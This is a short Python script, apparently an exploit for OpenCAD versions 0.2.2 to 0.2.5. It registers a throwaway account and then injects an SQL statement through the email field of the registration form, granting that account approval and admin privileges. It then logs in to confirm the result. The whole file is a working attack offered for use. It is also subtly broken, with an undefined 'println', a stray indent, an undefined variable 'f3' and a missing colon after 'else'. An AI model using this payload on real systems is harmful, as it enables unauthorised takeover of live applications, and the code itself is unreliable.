CBLWnEYg

1#!/usr/bin/env python3
2
3import requests
4import os
5import random
6import sys
7
8Host = "url"
9
10RandomName = ""
11for x in range(7):
12    RandomName += str(random.randint(0,9))
13
14if len(sys.argv) == 1:
15    println("Usage: ./hack.py <host: complete url> <custom-username: default is random>")
16
17if len(sys.argv) == 2:
18    Host = str(sys.argv[1])
19
20if len(sys.argv) == 3:
21    Host = str(sys.argv[1])
22    RandomName = str(sys.argv[2])
23
24User = RandomName
25Email = RandomName + "@gmail.com"
26Pass = RandomName
27Payload = Email + "\"; UPDATE users SET approved=1, admin_privilege=1 WHERE email=\""+Email+"\";  --"
28LoginWorks = False
29
30print("OpenCAD Hack v6.0 for 0.2.2 to 0.2.5")
31
32print("Stage 1 - Register")
33r = requests.post(Host+"/actions/register.php", data={'register': 1, 'uname': User, 'email': Email,'identifier': 'A', 'division[0]': 1, 'password': Pass, 'password1': Pass})
34
35if r.status_code != 200:
36    print("Error: "+r.reason)
37    os._exit(os.EX_NOPERM)
38
39print("Stage 2 - SQL Injection")
40r2 = requests.post(Host+"/actions/register.php", data={'register': 1, 'uname': User, 'email': Payload,'identifier': 'A', 'division[0]': 1, 'password': Pass, 'password1': Pass})
41
42if r2.status_code != 200:
43    print("Error: "+r.reason)
44    os._exit(os.EX_NOPERM)
45
46print("Stage 3 - Verify")
47r3 = requests.post(Host+"/actions/login.php", data={'email': Email, 'password': Pass})
48    if "Your account hasn't been approved yet." not in f3.text:
49        LoginWorks = True
50
51if r3.status_code != 200:
52    print("Error: "+r.reason)
53    os._exit(os.EX_NOPERM)
54
55if LoginWorks:
56    print("Done: Host= '"+Host+"' Email= '"+Email+"' Password= '"+Pass+"'")
57else
58    print("Something went wrong, could not proove the Login to work!")